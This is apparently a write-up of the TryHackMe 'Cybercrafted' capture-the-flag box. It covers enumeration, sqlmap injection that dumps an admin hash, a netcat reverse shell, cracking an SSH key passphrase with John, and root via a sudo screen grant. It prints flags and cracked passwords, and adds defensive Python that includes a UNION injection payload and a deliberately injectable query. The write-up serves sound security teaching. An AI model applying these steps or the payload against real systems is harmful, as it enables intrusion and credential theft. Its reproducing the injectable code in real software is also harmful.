Cybercrafted

Reconnaissance

Looks like we will have to hack a Minecraft server this time. Navigating to the IP, name resolution appears to fail; that's because we get redirected to cybercrafted.thm, so add that name to your /etc/hosts file.

Following the CTF description, we will start with an Nmap scan to answer the first question.

NMAP output
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-23 17:33 CET
Warning: 10.10.49.224 giving up on port because retransmission cap hit (2).
Nmap scan report for cybercrafted.thm (10.10.49.224)
Host is up (0.043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 37:36:ce:b9:ac:72:8a:d7:a6:b7:8e:45:d0:ce:3c:00 (RSA)
|   256 e9:e7:33:8a:77:28:2c:d4:8c:6d:8a:2c:e7:88:95:30 (ECDSA)
|_  256 76:a2:b1:cf:1b:3d:ce:6c:60:f5:63:24:3e:ef:70:d8 (ED25519)
80/tcp    open  http      Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Cybercrafted
|_http-server-header: Apache/2.4.29 (Ubuntu)
25565/tcp open  minecraft Minecraft 1.7.2 (Protocol: 127, Message: ck00r lcCyberCraftedr ck00rrck00r e-TryHackMe-r  ck00r, Users: 0/1)
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   48.64 ms 10.8.0.1
2   48.92 ms cybercrafted.thm (10.10.49.224)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 398.60 seconds

So now we can answer the first two questions.

How many ports are open? Answer: 3
What service runs on the highest port? Answer: minecraft

The next question asks for subdomains, so let's fire up ffuf to enumerate them as virtual hosts, filtering out the 302 redirect that unknown Host headers return.

ffuf -w Subdomain.txt -u http://cybercrafted.thm -H "Host: FUZZ.cybercrafted.thm" -fc 302

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : http://cybercrafted.thm
 :: Wordlist         : FUZZ: Subdomain.txt
 :: Header           : Host: FUZZ.cybercrafted.thm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 302
________________________________________________

admin                   [Status: 200, Size: 937, Words: 218, Lines: 31]
www                     [Status: 200, Size: 832, Words: 236, Lines: 35]
admin                   [Status: 200, Size: 937, Words: 218, Lines: 31]
store                   [Status: 403, Size: 287, Words: 20, Lines: 10]
www                     [Status: 200, Size: 832, Words: 236, Lines: 35]

So now we have the answer to the next question.

Any subdomains? (Alphabetical order). Answer: admin store www

Scanning

Now we need to add the admin and store subdomains to our /etc/hosts file, and we can move on to finding a vulnerability.

After looking through a lot of directories and generally testing both subdomains, I found a SQL injection vulnerability in the search function of the store subdomain.

sqlmap -u http://admin.cybercrafted.thm/search.php --method POST --data "search=veqwveqwe&submit=" --dbs
[18:08:02] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapp

Now that we know the database names, we can fetch the tables. The only one that's non-standard for MySQL is webapp, so let's look at that one.

sqlmap -u http://store.cybercrafted.thm/search.php --method POST --data "search=veqwveqwe&submit=" --dump -T admin -D webapp
Database: webapp
Table: admin
[2 entries]
+----+------------------------------------------+---------------------+
| id | hash                                     | user                |
+----+------------------------------------------+---------------------+
| 1  | 88b949dd5cdfbecb9f2ecbbfa24e5974234e7c01 | xXUltimateCreeperXx |
| 4  | THM{bbe315906038c3a62d9b195001f75008}    | web_flag            |
+----+------------------------------------------+---------------------+
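The search endpoint is PHP (search.php), but the defect sqlmap exploited is language-independent: user input is concatenated into the SQL text. The following added example (my own Python/sqlite3 code, not the box's search.php) models the store search against a constructed in-memory database with an items table the search should query and an admin table it should never reach, and shows the injectable version beside the parameterised fix. The table contents, the column layout and the payload are all constructed for illustration.

```python
import sqlite3
from typing import List, Tuple

# Constructed in-memory stand-in for the webapp database: an items table the
# store search is meant to query, plus an admin table it should never reach.
# Names, prices and the placeholder hash are illustrative, not the box's data.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items (id INTEGER, name TEXT, price INTEGER);
        INSERT INTO items VALUES (1, 'diamond sword', 250), (2, 'iron pickaxe', 80);
        CREATE TABLE admin (id INTEGER, hash TEXT, user TEXT);
        INSERT INTO admin VALUES (1, 'PLACEHOLDER_HASH', 'example_admin');
    """)
    return conn

def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[Tuple]:
    # The user's input is pasted into the SQL text, so a quote inside it ends
    # the string literal and the rest is parsed as SQL (what sqlmap exploited).
    sql = f"SELECT id, name, price FROM items WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()

def search_safe(conn: sqlite3.Connection, term: str) -> List[Tuple]:
    # The input is bound as a parameter: it is only ever a value, never SQL.
    sql = "SELECT id, name, price FROM items WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()

# Constructed payload: closes the LIKE literal, UNIONs in the admin table with a
# matching column count, and comments out the trailing quote ("-- " with the
# trailing space also works as a comment in MySQL, which the real app uses).
UNION_PAYLOAD = "' UNION SELECT id, user, hash FROM admin -- "

def leaks_admin_rows(rows: List[Tuple]) -> bool:
    """True if a row from the admin table ended up in the search result."""
    return any(row[1] == "example_admin" for row in rows)

if __name__ == "__main__":
    db = build_db()
    print("normal search:          ", search_safe(db, "sword"))
    print("vulnerable + payload:   ", search_vulnerable(db, UNION_PAYLOAD))
    print("parameterised + payload:", search_safe(db, UNION_PAYLOAD))
```

With the payload, the vulnerable query returns the admin row alongside the items; the parameterised query treats the whole payload as a search string and returns nothing. Prepared statements (PDO or mysqli with bound parameters in PHP) are the fix; escaping or filtering quotes is not.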

Exploiting

So we got a flag, and what looks like credentials for the admin subdomain.

Cracking the hash at this website, we find the password is diamond123456789, so let's use it on the admin subdomain.
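The reason an online lookup recovers the password instantly is visible in the dump itself: a 40-character hex string is the shape of an unsalted SHA-1 digest, which is fast to compute and precomputed in lookup tables. This added example (my own code, not the application's) classifies a stored hash by its shape and shows the storage scheme the application should have used: a per-user random salt and a slow KDF (PBKDF2-HMAC-SHA256 from the standard library here), with the parameters stored next to the digest and a constant-time comparison on verification. The `pbkdf2-sha256$` encoding is my own convention.

```python
import hashlib
import hmac
import os
import re
from typing import Optional

# Digest lengths (in hex characters) of the unsalted, fast hashes that lookup
# sites and rainbow tables cover; 40 hex chars is the shape of the dumped hash.
UNSALTED_DIGESTS = {32: "MD5", 40: "SHA-1", 64: "SHA-256"}

def classify_stored_hash(value: str) -> str:
    """Judge a stored password hash from its shape alone."""
    if re.fullmatch(r"[0-9a-fA-F]+", value) and len(value) in UNSALTED_DIGESTS:
        return f"unsalted {UNSALTED_DIGESTS[len(value)]}: fast and lookup-table crackable"
    if value.startswith("pbkdf2-sha256$"):
        return "salted PBKDF2-SHA256: slow, one salt per user"
    return "unrecognised format"

def hash_password(password: str, iterations: int = 600_000,
                  salt: Optional[bytes] = None) -> str:
    """Store as algorithm$iterations$salt$digest so the parameters travel with it."""
    salt = salt if salt is not None else os.urandom(16)   # fresh salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2-sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_password(password: str, stored: str) -> bool:
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2-sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    # Constant-time comparison so timing does not leak how many bytes matched.
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))

if __name__ == "__main__":
    print(classify_stored_hash("88b949dd5cdfbecb9f2ecbbfa24e5974234e7c01"))
    stored = hash_password("diamond123456789")
    print(classify_stored_hash(stored), verify_password("diamond123456789", stored))
```

The salt defeats precomputed tables, and the iteration count makes every guess cost hundreds of thousands of hash operations instead of one. In PHP the equivalent is password_hash() / password_verify(), which default to bcrypt.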

Looks like it worked, and the panel allows us to execute system commands, so all that's left is to open a netcat listener and run our reverse shell payload.

Getting a reverse shell
max@1337 ~> nc -lvp 1337
Connection from 10.10.49.224:38948
/bin/sh: 0: can't access tty; job control turned off
$ ls
assets
dbConn.php
index.php
login.php
panel.php
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@cybercrafted:/var/www/admin$ export TERM=xterm; export SHELL=/bin/bash
www/admin$ export TERM=xterm; export SHELL=/bin/bash
www-data@cybercrafted:/var/www/admin$ ^Zfish: Job 1, 'nc -lvp 1337' has stopped
max@1337 ~> stty raw -echo;fg
Send job 1, “nc -lvp 1337” to foreground


www-data@cybercrafted:/var/www/admin$

Perfect. Going to the xxultimatecreeperxx user's home directory, we find an encrypted SSH private key.

id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,3579498908433674083EAAD00F2D89F6
(encrypted key body omitted)
-----END RSA PRIVATE KEY-----

Now we just need to crack its passphrase with John the Ripper and connect with it.

Cracking the private key
max@1337 ~> python3 ssh2john.py id_rsa > hash.txt
max@1337 ~> john --wordlist=rockyou.txt hash.txt
--------------------------------------------------------------------------
The library attempted to open the following supporting CUDA libraries,
but each of them failed.  CUDA-aware support is disabled.
libcuda.so.1: cannot open shared object file: No such file or directory
libcuda.dylib: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.so.1: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.dylib: cannot open shared object file: No such file or directory
If you are not interested in CUDA-aware support, then run with
--mca opal_warn_on_missing_libcuda 0 to suppress this message.  If you are interested
in CUDA-aware support, then try setting LD_LIBRARY_PATH to the location
of libcuda.so.1 to get passed this issue.
--------------------------------------------------------------------------
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
creepin2006      (id_rsa)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2021-12-23 18:27) 0.3703g/s 5311Kp/s 5311Kc/s 5311KC/s *7¡Vamos!
Session completed
max@1337 ~ [SIGINT]> ssh xxultimatecreeperxx@cybercrafted.thm -i id_rsa
Enter passphrase for key 'id_rsa':
xxultimatecreeperxx@cybercrafted:~$
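The John output explains why the passphrase fell in two seconds: "KDF/cipher ... is 0" and "iteration count is 1" mean the key is in the legacy PEM container (Proc-Type / DEK-Info headers), whose passphrase KDF is a single MD5 round. The newer openssh-key-v1 container uses bcrypt with a configurable round count. The following added example (my own code, not from the box or from OpenSSH) audits a private key file by its container headers and reports the KDF in use, so a defender can find keys that need re-encrypting with `ssh-keygen -p -o -a 100`. The three sample keys are constructed header-only stubs with dummy bodies; no real key material is included.

```python
import base64
import re
import struct
from dataclasses import dataclass

@dataclass
class KeyAudit:
    fmt: str          # "pem" (legacy OpenSSL container) or "openssh" (openssh-key-v1)
    encrypted: bool
    cipher: str
    kdf: str
    advice: str

OPENSSH_MAGIC = b"openssh-key-v1\x00"

def _read_string(buf: bytes, off: int):
    """Read one SSH wire-format string (uint32 big-endian length, then bytes)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n].decode(), off + 4 + n

def audit_private_key(text: str) -> KeyAudit:
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        # The container starts with the cipher name and the KDF name in the clear.
        cipher, off = _read_string(blob, len(OPENSSH_MAGIC))
        kdf, _ = _read_string(blob, off)
        if kdf == "none":
            return KeyAudit("openssh", False, cipher, kdf,
                            "unencrypted: add a passphrase with ssh-keygen -p -a 100")
        return KeyAudit("openssh", True, cipher, kdf,
                        "ok: bcrypt KDF makes each passphrase guess cost many rounds")
    if re.match(r"-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", lines[0]):
        headers = {}
        for ln in lines[1:]:
            if ":" not in ln:
                break          # blank line or base64 body: the headers are over
            k, v = ln.split(":", 1)
            headers[k.strip()] = v.strip()
        if headers.get("Proc-Type") == "4,ENCRYPTED":
            cipher = headers.get("DEK-Info", "?").split(",")[0]
            return KeyAudit("pem", True, cipher, "EVP_BytesToKey MD5, 1 iteration",
                            "weak: one MD5 round per guess; re-encrypt with ssh-keygen -p -o -a 100")
        return KeyAudit("pem", False, "none", "none",
                        "unencrypted: add a passphrase with ssh-keygen -p -o -a 100")
    raise ValueError("not a recognised private key container")

# Helpers to build constructed sample containers (header region only).
def _pack_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b

def _pem_wrap(label: str, body: bytes) -> str:
    b64 = base64.b64encode(body).decode()
    wrapped = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN {label}-----\n{wrapped}\n-----END {label}-----\n"

# Constructed samples: the IV and the bodies are dummy values, not real keys.
SAMPLE_LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

QUJDRA==
-----END RSA PRIVATE KEY-----
"""
SAMPLE_OPENSSH_BCRYPT = _pem_wrap("OPENSSH PRIVATE KEY", OPENSSH_MAGIC
    + _pack_string(b"aes256-ctr") + _pack_string(b"bcrypt") + _pack_string(b"\x00" * 20))
SAMPLE_OPENSSH_PLAIN = _pem_wrap("OPENSSH PRIVATE KEY", OPENSSH_MAGIC
    + _pack_string(b"none") + _pack_string(b"none") + _pack_string(b""))

if __name__ == "__main__":
    for sample in (SAMPLE_LEGACY_ENCRYPTED, SAMPLE_OPENSSH_BCRYPT, SAMPLE_OPENSSH_PLAIN):
        print(audit_private_key(sample))
```

Run over a fleet's ~/.ssh directories, the pem + encrypted result is the one that matters: it looks protected but costs an attacker one MD5 per guess, which is exactly the 5311K guesses per second John reports above.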

Perfect, we are in as a normal user now, so go grab the flag at /opt/minecraft and let's get to root.

Privilege Escalation

From looking at the home directory, it looks like we are going to need to do some lateral movement before root.

After exploring the filesystem, there's simply a log.txt file containing the 'cybercrafted' user's password in /opt/minecraft/cybercrafted/plugins/LoginSystem, so just grab that and switch to that user.

The first thing I do after logging in as a more privileged user is look for binaries with sudo or SUID permissions, so let's find out.

sudo -l
[sudo] password for cybercrafted:
Matching Defaults entries for cybercrafted on cybercrafted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cybercrafted may run the following commands on cybercrafted:
    (root) /usr/bin/screen -r cybercrafted

Looking at GTFOBins, this binary really shouldn't have sudo permissions: screen doesn't drop privileges, and once attached to the session we can create a new window, which is a shell with root privileges. The "-r cybercrafted" argument restriction in sudoers does nothing to prevent that. So, finally,

Abusing excessive binary permissions
CTRL + A, then C (opens a new screen window, which is a shell running as root)
# ls
banned-ips.txt      bukkit.yml    craftbukkit-1.7.2-server.jar  logs     permissions.yml  server-icon.png    white-list.txt  world_nether
banned-players.txt  commands.yml  help.yml                      ops.txt  plugins          server.properties  world           world_the_end
# id
uid=0(root) gid=1002(cybercrafted) groups=1002(cybercrafted)
# cd /root
# ls
root.txt
# cat root.txt
THM{8bb1eda065ceefb5795a245568350a70}
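The sudoers entry is the kind of thing a defender can catch mechanically: any rule that lets a user run an interactive program as root is a shell grant, whatever arguments sudoers pins. The added example below (my own code, not a tool from the box) parses the `sudo -l` output shown above, extracts the (runas) command entries, and flags binaries that GTFOBins documents as able to open a shell; the SHELL_CAPABLE set is a short constructed subset of that list. It also flags NOPASSWD grants to root, a rule this box does not have but the same parser handles.

```python
import re
from typing import Dict, List

# Constructed short list of interactive programs that can hand the caller a
# shell, an editor or a file write once running (GTFOBins documents many more).
# For these, restricting the arguments in sudoers does not contain the user.
SHELL_CAPABLE = {"screen", "tmux", "vim", "vi", "nano", "less", "more", "man",
                 "find", "awk", "perl", "python", "python3", "bash", "sh"}

# "(runas) [TAG: TAG: ...] /cmd args, /cmd2 args" as printed by sudo -l
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(output: str) -> List[Dict]:
    """Pull the (runas) [TAGS:] command entries out of `sudo -l` output."""
    entries, in_commands = [], False
    for line in output.splitlines():
        if "may run the following commands on" in line:
            in_commands = True          # everything before this is Defaults noise
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = [t for t in re.split(r":\s*", m.group("tags")) if t]
        for cmd in m.group("cmds").split(", "):
            entries.append({"runas": m.group("runas").strip(),
                            "tags": tags, "command": cmd.strip()})
    return entries

def audit_sudo(entries: List[Dict]) -> List[str]:
    """Return one finding per entry that amounts to a root shell grant."""
    findings = []
    for e in entries:
        binary = e["command"].split()[0].rsplit("/", 1)[-1]
        as_root = e["runas"].startswith(("root", "ALL"))
        if as_root and (binary in SHELL_CAPABLE or binary == "ALL"):
            findings.append(f"{e['command']} as {e['runas']}: {binary} can open a shell, "
                            "so the argument restriction does not contain the user")
        if as_root and "NOPASSWD" in e["tags"]:
            findings.append(f"{e['command']} as {e['runas']}: NOPASSWD, "
                            "no password check stands between a hijacked session and root")
    return findings

# Sample input: the sudo -l output from the box, as shown in the writeup.
SAMPLE_SUDO_L = """\
Matching Defaults entries for cybercrafted on cybercrafted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User cybercrafted may run the following commands on cybercrafted:
    (root) /usr/bin/screen -r cybercrafted
"""

if __name__ == "__main__":
    for finding in audit_sudo(parse_sudo_l(SAMPLE_SUDO_L)):
        print("FINDING:", finding)
```

The fix on this box is not a tighter sudoers line but no sudo at all: run the Minecraft server as the cybercrafted user (a systemd service or a screen session owned by that user), so the console is attachable without ever crossing a privilege boundary.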